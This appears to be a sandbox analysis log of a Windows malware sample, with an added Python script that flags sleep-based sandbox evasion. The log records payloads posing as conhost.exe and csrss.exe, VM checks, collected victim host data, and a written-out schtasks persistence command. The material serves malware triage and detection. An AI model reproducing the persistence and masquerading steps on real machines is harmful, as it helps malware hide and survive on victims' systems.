                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596016
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595906
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595797
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595688
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595563
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595438
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595313
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595200
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595093
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594984
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594875
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594766
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594656
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594547
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594438
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594328
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Window / User API: threadDelayed 1672
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Window / User API: threadDelayed 7988
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\bveMYDWO.log
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\vnUJHstD.log
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe TID: 2576 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe TID: 4432 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe TID: 2504 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 320 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 2828 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe TID: 7152 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe TID: 4268 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe TID: 2952 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe TID: 3140 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe TID: 5560 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe TID: 3448 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe TID: 2700 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6348 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -27670116110564310s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -599855s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -599735s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -599594s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -599469s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -599359s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -599250s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -599141s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -599031s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598922s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598812s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598703s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598594s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6844 | Thread sleep time: -7200000s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598484s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598375s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598266s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598141s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -598016s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597906s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597797s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597688s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597571s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597469s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597359s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597250s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597141s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -597031s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596922s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596812s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596703s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596594s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596469s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596359s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596250s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596141s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -596016s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -595906s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -595797s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -595688s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -595563s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -595438s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -595313s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -595200s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -595093s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -594984s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -594875s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -594766s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -594656s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -594547s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -594438s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -594328s >= -30000s
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe TID: 3836 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe TID: 2956 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 30000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599855
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599735
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598922
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598812
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598703
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 3600000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598484
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598375
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598266
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598016
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597906
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597797
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597688
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597571
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596922
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596812
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596703
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596016
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595906
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595797
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595688
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595563
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595438
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595313
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595200
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 595093
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594984
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594875
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594766
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594656
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594547
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594438
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 594328
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Thread delayed: delay time: 922337203685477
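                    The "Thread delayed" and "Thread sleep time" rows above are the raw material for a sleep-evasion verdict. Two patterns are visible: several processes request a delay of 922337203685477 ms, which is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10,000), i.e. a sleep that is never meant to return; and conhost.exe thread 6148 re-issues a countdown of roughly ten-minute sleeps (600000, 599855, 599735, ...) dozens of times, while the sandbox's own threshold is the 30000 ms it prints as ">= -30000s". The Python below is an added example, not part of the Joe Sandbox report or its signature engine: it parses rows of the shape shown above (fused or separated by " | ", with or without a TID), groups delays per process, and tags each one. The sample rows are constructed from values in this report.

```python
import re
from collections import defaultdict

# TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10_000). When the
# report prints this as a delay, the thread asked to sleep "forever".
INFINITE_MS = 922_337_203_685_477
# The threshold the report compares against (">= -30000s"): one call at or
# above it is long enough to outlast a sandbox's patience for a single sleep.
SANDBOX_PATIENCE_MS = 30_000

# One report row. The path may be fused to the description (as extracted) or
# separated by " | "; an optional "TID: n" may follow the path.
ROW = re.compile(
    r"Source:\s*(?P<src>.+?\.exe)"
    r"(?:\s+TID:\s*(?P<tid>\d+))?"
    r"\s*\|?\s*Thread (?:delayed: delay time: |sleep time: -)"
    r"(?P<ms>\d+)"
)

# Constructed sample in the shape of the rows above (values taken from this report).
SAMPLE = r"""
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 600000
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599855
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599735
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 3600000
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe TID: 2576 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe TID: 7152 | Thread sleep time: -922337203685477s >= -30000s
"""

def parse_delays(text):
    """Map each process path to the list of delays (ms) it requested, in row order."""
    delays = defaultdict(list)
    for line in text.splitlines():
        m = ROW.search(line)
        if m:
            delays[m.group("src")].append(int(m.group("ms")))
    return dict(delays)

def classify(delays, min_calls=10):
    """Tag each process with the sleep-evasion patterns its delays exhibit."""
    verdicts = {}
    for src, ms in delays.items():
        finite = [d for d in ms if d < INFINITE_MS]
        long_sleeps = [d for d in finite if d >= SANDBOX_PATIENCE_MS]
        tags = []
        if len(finite) < len(ms):
            tags.append("infinite-sleep")        # a thread parked for good
        if long_sleeps:
            tags.append("long-sleep")            # a single call outlasts patience
        if len(long_sleeps) >= min_calls:
            tags.append("repeated-long-sleep")   # countdown loop of long waits
        verdicts[src] = {
            "calls": len(ms),
            "max_finite_ms": max(finite, default=0),
            "total_finite_s": round(sum(finite) / 1000),
            "tags": tags,
        }
    return verdicts

if __name__ == "__main__":
    for src, verdict in classify(parse_delays(SAMPLE), min_calls=4).items():
        print(f"{src}: {verdict}")
```

Run against the full row list above rather than the sample, conhost.exe crosses the default `min_calls=10` on its own, which is the signal a triage rule should key on: a handful of long sleeps is normal for a scheduler, a countdown of dozens is not.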
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File opened: C:\Users\user\Desktop\desktop.ini
                    Source: KtMg6d1Ivx.exe, 00000000.00000002.2051978545.000000001C2F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}#
                    Source: w32tm.exe, 0000001C.00000002.2092493272.0000028EAF2B7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249523523.0000000000780000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process token adjusted: Debug
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Process token adjusted: Debug
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Process token adjusted: Debug
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Process token adjusted: Debug
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Process token adjusted: Debug
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Process token adjusted: Debug
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Process token adjusted: Debug
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Process token adjusted: Debug
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Process token adjusted: Debug
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFB8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBB09EA61AE75492FB889F62CD03E359D.TMP"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BC.tmp" "c:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP"
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000276D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000276D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [{},"5.0.4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","N","Y","N","C:\\Windows\\ImmersiveControlPanel\\pris","Unknown (Unknown)","Unknown (Unknown)","Program Manager","81.181.57.74","US / United States","Georgia / Atlanta","33.7485 / -84.3871"]
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: own (Unknown)","Unknown (Unknown)","Program Manager","81.181.57.74","US / United States","Georgia / Atlanta","33.7485 / -84.3871
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager`
